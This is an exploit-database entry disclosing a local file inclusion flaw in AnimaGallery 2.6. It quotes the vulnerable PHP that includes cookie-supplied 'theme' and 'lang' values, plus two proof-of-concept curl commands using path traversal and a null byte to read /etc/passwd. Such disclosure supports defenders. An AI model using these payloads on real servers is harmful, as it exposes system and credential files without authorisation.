header-logo
Suggest Exploit
vendor:
AnimaGallery
by:
Anonymous
7.5
CVSS
HIGH
Local File Include Vulnerability
98
CWE
Product Name: AnimaGallery
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Centos 6.5,php 5.3.2,magic_quotes_gpc=off
2015

AnimaGallery 2.6 (theme and lang cookie parametre) Local File Include Vulnerability

AnimaGallery 2.6 is vulnerable to Local File Include Vulnerability due to lack of taint checking in the 'theme' and 'lang' cookie parameters. An attacker can exploit this vulnerability by sending a maliciously crafted cookie to the server, which can lead to the disclosure of sensitive information.

Mitigation:

Taint checking should be implemented in the application to prevent malicious input from being processed.
Source

Exploit-DB raw data:

# Exploit Title: AnimaGallery 2.6 (theme and lang cookie parametre) Local File Include Vulnerability 
# Date: 2015/06/07 
# Vendor Homepage: http://dg.no.sapo.pt/ 
# Software Link:http://dg.no.sapo.pt/AnimaGallery2.6.zip
# Version: 2.6
# Tested on: Centos 6.5,php 5.3.2,magic_quotes_gpc=off # Category: webapps

* Description

func.php
line 21 - 22:

include('themes/'.$THEME.'/templates.php');
include('languages/'.$LANG.'.php');

$lang and $THEME parametre from import_theme_lang() function.

function import_theme_lang()
{
  $THEME = DEFAULT_THEME;
  if(isset($_COOKIE['theme']) AND !THEME_LOCKED)
    $THEME = $_COOKIE['theme'];  <--  Not Taint Checking

  $LANG = DEFAULT_LANG;
  if(isset($_COOKIE['lang']) AND @file_exists('languages/'.$_COOKIE['lang'].'.php') AND !LANG_LOCKED)
    $LANG = $_COOKIE['lang'];     <--- Not Taint Checking

  return(array($THEME, $LANG));
}


* Proof of Concept

curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "lang=../../../../../../../etc/passwd%00"

curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "theme=../../../../../../../etc/passwd%00"

Navigation

Suggest Exploit

Services By CQR